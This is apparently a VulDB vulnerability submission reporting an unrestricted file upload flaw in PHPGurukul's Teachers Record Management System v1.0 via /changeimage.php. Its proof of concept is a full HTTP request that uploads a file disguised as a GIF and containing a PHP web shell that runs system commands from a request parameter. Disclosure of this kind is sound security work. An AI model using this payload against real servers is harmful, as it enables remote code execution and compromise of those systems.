Submit #166847: Teachers Record Management System v1.0 – File Upload Type Validation Error in /changeimage.phpinfo

Title	Teachers Record Management System v1.0 – File Upload Type Validation Error in /changeimage.php
Description	# VULNERABILITY-TYPE : Unrestricted Upload of File with Dangerous Type # VENDOR OF THE PRODUCT : PHPGURUKUL # AFFECTED PRODUCT : Teachers Record Management System # VERSION: v1.0 # ATTACK TYPE : REMOTE # IMPACT: CODE EXECUTION # AFFECTED COMPONENTS: SOURCE-CODE(changeimage.php) # ATTACK VECTOR: changeimage(filename) # DESCRIPTION: PHPGURUKUL Teachers Record Management System v1.0 suffers from File Upload Type Validation Error via /changeimage.php(filename) # REFERENCES: 1.) https://cwe.mitre.org/data/definitions/434.html # Vendor Homepage: https://phpgurukul.com> # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ # BURPSUITE_POST_REQUEST ``` POST /trms/teacher/changeimage.php HTTP/1.1 Host: localhost Content-Length: 442 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: <http://localhost> Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: <http://localhost/trms/teacher/changeimage.php> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc Connection: close ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="subjects" John Doe ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif" Content-Type: image/gif GIF89a <?php echo system($_REQUEST['dx']); ?> ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryndAPYa0GGOxSUHdF-- ``` # PROOF_OF_CONCEPT - GITHUB-LINK : https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
Source	⚠️ https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
User	Affan (UID 39417)
Submission	06/09/2023 18:40 (3 years ago)
Moderation	06/09/2023 22:35 (4 hours later)
Status	Accepted
VulDB entry	231176 [PHPGurukul Teachers Record Management System 1.0 Profile Picture /changeimage.php newpic unrestricted upload]
Points	20

◂ Previous Overview Next ▸

Might our Artificial Intelligence support you?

Check our Alexa App!